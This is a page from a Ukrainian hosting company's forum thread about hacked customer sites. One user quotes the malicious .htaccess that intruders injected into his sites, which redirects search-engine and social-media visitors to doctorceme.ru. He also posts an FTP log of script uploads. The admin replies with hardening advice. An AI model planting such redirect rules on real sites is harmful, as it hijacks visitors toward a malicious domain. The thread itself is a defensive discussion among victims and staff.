FreeHost.com.UA
Января 21, 2018, 07:50:45 pm *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Новости: Распродажа серверов http://freehost.com.ua/forum/index.php?topic=2093.0
 
   Начало   Помощь Поиск Войти Регистрация  
Страниц: 1 2 [3] 4
  Печать  
Автор Тема: Взломы сайтов  (Прочитано 11087 раз)
Komintern
FreeHost
*****

Karma: 9
Сообщений: 417


Админ


Просмотр профиля WWW
« Ответ #30 : Июля 19, 2012, 02:36:02 pm »

Сьогодні знову фіксили файли? Дата файлів хтаццесс сьогоднішня в 12.25.

Сейчас работает программа автоматической очистки. Вредоносный код в файлах на данный момент есть?
На большинстве серверов файлы уже очищены, всем  клиентам, подвергшимся взлому, были высланы уведомления на email.
Записан

Lucy in the Sky with Diamonds
Taurus
Newbie
*

Karma: 0
Сообщений: 23


I f*ck your mind...


Просмотр профиля WWW
« Ответ #31 : Июля 19, 2012, 02:43:21 pm »

Я вчора помітив, що вечері дати помінялись. І сьогодні дивлюсь теж. Трішки напрягло. Шкідливого коду немає. Тільки 2 пробіли в кінцях файлів добавились, мабуть після вашого фіксу. В мене давно вичищено вручну ще 14 числа. Тому і спостерігаю за ними. Листи отримав вчора 2 шт =)
Записан

AMBA
Hero Member
*****

Karma: 2
Сообщений: 955



Просмотр профиля E-mail
« Ответ #32 : Июля 19, 2012, 02:54:34 pm »

Блин, надо реселлера продлить, а то мне рассылки не приходят упорно Улыбающийся
Записан
VadimNext
Newbie
*

Karma: 0
Сообщений: 18


Просмотр профиля E-mail
« Ответ #33 : Августа 07, 2012, 09:21:52 am »

На всех сайтах всех аккаунтов также были изменены файлы .htaccess

Но, сообщений от freehost о взломе аккаунтов и изменении файлов .htaccess на контакный е-мейл не получил.

Я один такой "счастливчик" или есть еще кто-то у кого изменены файлы .htaccess (дата изменения 19 июля 2012)
и не было извещения о происходящих событиях?
Записан
Komintern
FreeHost
*****

Karma: 9
Сообщений: 417


Админ


Просмотр профиля WWW
« Ответ #34 : Августа 07, 2012, 10:10:26 am »

То, что извещения рассылались - факт. Возможно по каким-то причинам некоторые действительно их не получили. Причин тому множество - от временных проблем с серверами получателей и до спам-фильтров.
Последствия взлома были устранены, волноваться поводов нет.
Если вас интересует хождение почты на ваш ящик - напишите нам на support, будем тестировать, смотреть логи.
Записан

Lucy in the Sky with Diamonds
AMBA
Hero Member
*****

Karma: 2
Сообщений: 955



Просмотр профиля E-mail
« Ответ #35 : Августа 07, 2012, 03:54:09 pm »

Мне не приходило ни одного, но я уже смирился что почему-то мне в 90% случаев такие рассылки не приходят. При том что я и реселлер и как основное и дополнительное мои мылы указаны почти на всех аккаунтах. Некоторым клиентам напрямую поприходило. Почта на вас же, спам фильтр отрублен и с хождением обычных писем и в переписке с сапортом в последнее время никаких проблем не наблюдается. Думаю что есть какие-то недоработки в скрипте рассылки, нужно его в первую очередь тестировать Улыбающийся
Записан
Влад
Newbie
*

Karma: 0
Сообщений: 29


Просмотр профиля
« Ответ #36 : Марта 22, 2013, 03:01:25 am »

На всех сайтах всех аккаунтов также были изменены файлы .htaccess

Но, сообщений от freehost о взломе аккаунтов и изменении файлов .htaccess на контакный е-мейл не получил.

Я один такой "счастливчик" или есть еще кто-то у кого изменены файлы .htaccess (дата изменения 19 июля 2012)
и не было извещения о происходящих событиях?

Вы не один счастливчик.

У меня  40 сайтов, из них на FreeHost 10 CMS, на разных скриптах. На протяжении, кажется 8 месяцев, во всех десяти периодически переписывается htaccess вот таким текстом:

Options -Indexes

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*youtube.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*qq.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*blog.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]

RewriteRule .* http://doctorceme.ru/ [R,L]

ErrorDocument 401 http://doctorceme.ru/

ErrorDocument 403 http://doctorceme.ru/

ErrorDocument 404 http://doctorceme.ru/

ErrorDocument 500 http://doctorceme.ru/
« Последнее редактирование: Марта 22, 2013, 03:04:28 am от Влад » Записан
Komintern
FreeHost
*****

Karma: 9
Сообщений: 417


Админ


Просмотр профиля WWW
« Ответ #37 : Марта 22, 2013, 11:04:36 am »

Если сайты в одном хостинг-акаунте, то достаточного одного инфицированного сайта чтобы заразить все - т.к uid и gid, с которыми работают скрипты - принадлежит логину, за которым хостинг закреплен.
Записан

Lucy in the Sky with Diamonds
Влад
Newbie
*

Karma: 0
Сообщений: 29


Просмотр профиля
« Ответ #38 : Марта 25, 2013, 05:05:19 pm »

Если сайты в одном хостинг-акаунте, то достаточного одного инфицированного сайта чтобы заразить все - т.к uid и gid, с которыми работают скрипты - принадлежит логину, за которым хостинг закреплен.

У меня 2 хостинг аккаунта на Фрихосте 3 на другом хостере. Заражено только на Фрихосте.

FTP - FileZilla захожу по ней на оба хостера.
Вывод - FileZilla не виновата, т.к. воруется только пароли Фрихоста.

Поменял проли на ФТП в одном аккаунте на Фрихосте, на другом аккаунте не менял.
Если htaccess будет переписан ботом только на аккаунте, где пароль не менялся, значит смена пароля помогла, и поменяю на втором аккаунте.

Если htaccess будет переписан ботом на обоих аккаунтах, значит смена пароля ФТП доступа из панели управления не помогает.

Будем следить и делать выводы.

Это пример лога не санкционированного фтп-доступа:

Mar 23 15:27:10 s9 pure-ftpd: (хххххххх@91.121.92.98) [INFO] Can't change directory to *: No such file or directory
Mar 23 15:27:10 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] /sata1/home/users/хххххххх/www//хх.хххххххх.com/4917000733.pl uploaded  (1895 bytes, 42.91KB/sec)
Mar 23 15:27:11 s9 pure-ftpd: (хххххххх@91.121.92.98) [INFO] Can't change directory to *: No such file or directory
Mar 23 15:27:11 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] Deleted /sata1/home/users/хххххххх/www//all.хххххххх.com/4917000733.pl
Mar 23 15:27:12 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] /sata1/home/users/хххххххх/www//cgi-bin/4917000733.pl uploaded  (1895 bytes, 43.47KB/sec)
Mar 23 15:27:13 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] Deleted /sata1/home/users/хххххххх/www//cgi-bin/4917000733.pl
Mar 23 15:27:13 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] /sata1/home/users/realtyisr/www//хххххххх.хххххххх.in.ua/4917000733.pl uploaded  (1895 bytes, 43.72KB/sec)
Mar 23 15:27:15 s9 pure-ftpd: (хххххххх@91.121.92.98) [INFO] Can't change directory to *: No such file or directory
Mar 23 15:27:15 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] Deleted /sata1/home/users/realtyisr/www//хххххххх.хххххххх.in.ua/4917000733.pl
Mar 23 15:27:16 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] /sata1/home/users/хххххххх/www//хххххххх.хххххххх.com/4917000733.pl uploaded  (1895 bytes, 44.26KB/sec)
Mar 23 15:27:17 s9 pure-ftpd: (хххххххх@91.121.92.98) [INFO] Can't change directory to *: No such file or directory
Mar 23 15:27:17 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] Deleted /sata1/home/users/хххххххх/www//хххххххх.хххххххх.com/4917000733.pl
Mar 23 15:27:17 s9 pure-ftpd: (хххххххх@91.121.92.98) [INFO] Can't change directory to *: No such file or directory
Mar 23 15:27:18 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] /sata1/home/users/хххххххх/www//logs/www/4917000733.pl uploaded  (1895 bytes, 43.36KB/sec)
Mar 23 15:27:19 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] Deleted /sata1/home/users/хххххххх/www//logs/www/4917000733.pl
Mar 23 15:27:19 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] /sata1/home/users/хххххххх/www//хххххххх.хххххххх.in.ua/4917000733.pl uploaded  (1895 bytes, 44.09KB/sec)
Mar 23 15:27:20 s9 pure-ftpd: (хххххххх@91.121.92.98) [INFO] Can't change directory to *: No such file or directory
Mar 23 15:27:21 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] /sata1/home/users/хххххххх/www//хххххххх.хххххххх.in.ua/cgi-bin/4917000733.pl uploaded  (1895 bytes, 43.78KB/sec)
Mar 23 15:27:21 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] Deleted /sata1/home/users/хххххххх/www//хххххххх.хххххххх.in.ua/cgi-bin/4917000733.pl
Mar 23 15:27:21 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] Deleted /sata1/home/users/хххххххх/www//хххххххх.хххххххх.in.ua/4917000733.pl
Mar 23 15:27:22 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] /sata1/home/users/хххххххх/www//хххххххх.хххххххх.com/4917000733.pl uploaded  (1895 bytes, 43.96KB/sec)
Mar 23 15:27:23 s9 pure-ftpd: (хххххххх@91.121.92.98) [INFO] Can't change directory to *: No such file or directory
Mar 23 15:27:23 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] Deleted /sata1/home/users/хххххххх/www//хххххххх.хххххххх.com/4917000733.pl
Mar 23 15:27:24 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] /sata1/home/users/хххххххх/www//www.хххххххх.org/4917000733.pl uploaded  (1895 bytes, 43.73KB/sec)
Mar 23 15:27:25 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] Deleted /sata1/home/users/хххххххх/www//www.хххххххх.org/4917000733.pl
Mar 23 15:27:26 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] /sata1/home/users/хххххххх/www//www.galvanic.net.ua/4917000733.pl uploaded  (1895 bytes, 44.15KB/sec)
Mar 23 15:27:27 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] Deleted /sata1/home/users/хххххххх/www//www.хххххххх.net.ua/4917000733.pl
Mar 23 15:27:27 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] /sata1/home/users/хххххххх/www//www.хххххххх.com/4917000733.pl uploaded  (1895 bytes, 41.29KB/sec)
Mar 23 15:27:28 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] Deleted /sata1/home/users/хххххххх/www//www.хххххххх.com/4917000733.pl
Mar 23 15:27:29 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] /sata1/home/users/хххххххх/www//www.хххххххх.in.ua/4917000733.pl uploaded  (1895 bytes, 44.16KB/sec)
Mar 23 15:27:30 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] Deleted /sata1/home/users/хххххххх/www//www.хххххххх.in.ua/4917000733.pl
Mar 23 15:27:30 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] /sata1/home/users/хххххххх/www//www.хххххххх.com/4917000733.pl uploaded  (1895 bytes, 44.10KB/sec)
Mar 23 15:27:31 s9 pure-ftpd: (хххххххх@91.121.92.98) [NOTICE] Deleted /sata1/home/users/хххххххх/www//www.хххххххх.com/4917000733.pl
Mar 23 15:27:31 s9 pure-ftpd: (хххххххх@91.121.92.98) [INFO] Logout.
Mar 23 17:26:34 s9 pure-ftpd: (хххххххх@94.23.33.128) [NOTICE] /sata1/home/users/хххххххх/www//хххххххх.хххххххх.in.ua/images.php uploaded  (12947 bytes, 74.04KB/sec)
Mar 23 17:26:34 s9 pure-ftpd: (хххххххх@94.23.33.128) [INFO] Logout.
Mar 23 20:28:55 s9 pure-ftpd: (хххххххх@94.23.33.128) [NOTICE] Deleted /sata1/home/users/хххххххх/www//хххххххх.хххххххх.in.ua/images.php
Mar 23 20:28:55 s9 pure-ftpd: (хххххххх@94.23.33.128) [INFO] Logout.



 

Записан
Komintern
FreeHost
*****

Karma: 9
Сообщений: 417


Админ


Просмотр профиля WWW
« Ответ #39 : Марта 25, 2013, 05:20:12 pm »

Речь не про FTP. Если заливается к примеру веб-шелл, то он работает с правами обычного php-скрипта, т.е работает от uid и gid владельца акаунта, имеет права на запись в каталоги, ему принадлежащие.
Записан

Lucy in the Sky with Diamonds
Влад
Newbie
*

Karma: 0
Сообщений: 29


Просмотр профиля
« Ответ #40 : Марта 25, 2013, 06:08:37 pm »

Речь не про FTP. Если заливается к примеру веб-шелл, то он работает с правами обычного php-скрипта, т.е работает от uid и gid владельца акаунта, имеет права на запись в каталоги, ему принадлежащие.

Спасибо.

Следовательно я должен зайти в панель управления аккаунтом, и настроить что?
Записан
Komintern
FreeHost
*****

Karma: 9
Сообщений: 417


Админ


Просмотр профиля WWW
« Ответ #41 : Марта 25, 2013, 06:32:32 pm »

Что настроить? Прежде всего - необходимо выполнить все рекомендации из этой темы:
http://forum-freehost.com.ua/index.php?topic=2124.0
т.е - обновить CMS, выставить права, ограничить доступ. Если CMS не используется, а работает самописный сайт - нужно убедиться что в нем нет уязвимостей.
Далее - не включать ненужных расширений PHP и потенциально опасных функций (shell_exec, e-modifier, и прочее).
Проводить антивирусную проверку время от времени (функция есть в панели).
Большинство клиентов считают, что если взломан их сайт - то это уязвимость в серверном ПО хостера. Это в корне неправильное суждение - серверное ПО позволяет обеспечить достаточно высокий уровень безопасности. Но когда клиент держит сайт на joomla 1.5, поставил chmod -R 777 *, включил все потенциально опасные функции (т.к не работало а какие конкретно надо - он не знает), и благополучно о сайте забыл - то мы ничем не сможем помочь такому клиенту. Лишь половина, или даже треть безопасности вашего сайта зависит от нас. Остальное - от программиста и владельца самого сайта.
Записан

Lucy in the Sky with Diamonds
Влад
Newbie
*

Karma: 0
Сообщений: 29


Просмотр профиля
« Ответ #42 : Марта 25, 2013, 08:16:07 pm »

Все манипуляции проведены.

В панели управление антивирусной проверки не нашел?



Что-то не дождусь ответа. Так, следовать совету, если в панели антивируса нет?

Что делать?

ЕСТЬ ЛИ В ПАНЕЛИ ФУНКЦИЯ АНТИВИРУСНОЙ ПРОВЕРКИНепонимающий А-У-У-у-у?


Не дождавшись ответа, и ознакомившись с этой философией о безопасности еще раз, обратился в поддержку.
Получил такой ответ:

"Здравствуйте.
Благодарим за ваше обращение.

На вашем сервере к сожалению данная функция не доступна, она доступна на более новых серверах. Вы можете заказать миграцию аккаунта на новый сервер с поддержкой РНР 5.3 через админ-панель https://admin.freehost.com.ua раздел Управление сайтом - Миграция аккаунта"

Вот такая разная политика пезопасности для разных серверов. А пакеты одинаковой стоимости.

"Не равное всем равенство" :-)


Теперь понял, для чего пользователь-Komintern так упорно пишет об антивирусе в панели управления: в разделе МИГРАЦИЯ АККАУНТА написано "Изменение сервера БД выполняется бесплатно, стоимость переноса файлов аккаунта на другой сервер составляет 5 у.е."

А, не проделки ли это...?  Ой, простите, - не маркетинг ли?
« Последнее редактирование: Марта 27, 2013, 07:33:49 pm от Влад » Записан
aprel
Member
*****

Karma: 1
Сообщений: 470


aprel


Просмотр профиля WWW
« Ответ #43 : Апреля 04, 2013, 12:18:18 pm »

 Смеющийся Все, заговор раскрыт
Записан

Бывший саппортер
Проблема: пишет ошибку "Выбрана неверная папка". Что делать? -- Решение:очевидно - обратить папку в свою веру.

Dwar'юсь
Komintern
FreeHost
*****

Karma: 9
Сообщений: 417


Админ


Просмотр профиля WWW
« Ответ #44 : Апреля 04, 2013, 12:57:44 pm »

Нет, не маркетинг. Вы платите за перенос ваших файлов с сервера на сервер.
Есть бесплатная альтернатива - заказываете тестовый хостинг, заливаете туда сайт и базу, пишете в отдел продаж и мы закрываем ваш старый акаунт, а средства что были за него уплачены - идут в счет оплаты нового.

Цитировать
Вот такая разная политика безопасности для разных серверов. А пакеты одинаковой стоимости.

Это обусловлено тем, что у нас уже был опыт внедрения систем безопасности на работающие сервера. Заканчивалось это обычно тем, что часть ранее работавших сайтов в силу введения ограничений безопасности, или обновления версий perl/php/apache, переставали работать т.к не были на это рассчитаны и настроены. Поэтому там, где изначально клиент приобретал услугу с определенным набором ПО - внесение в этот набор изменений не одобряет подавляющее большинство клиентов, с позиции "у меня и так все работает". До сих пор работает много серверов с неподдерживаемым самими разработчиками PHP4, и убрать его поддержку с хостинга - значит "сломать" несколько тысяч работающих сайтов. А продолжать его использовать - значит подвергаться риску взлома, т.к только очень старые движки работают на такой версии PHP. По мере того, как количество клиентов, использующих старые неподдерживаемые движки, будет сокращаться и люди будут переходить на более современный код - мы будем производить обновление серверов.
Поэтому предлагается вариант миграции на другой сервер, либо перенос файлов делаем мы за 5 у.е, либо вы бесплатно заказываете новый акаунт и переносите сайт сами.
« Последнее редактирование: Апреля 04, 2013, 01:05:35 pm от Komintern » Записан

Lucy in the Sky with Diamonds
Страниц: 1 2 [3] 4
  Печать  
 
Перейти в:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.16 | SMF © 2006-2011, Simple Machines Valid XHTML 1.0! Valid CSS!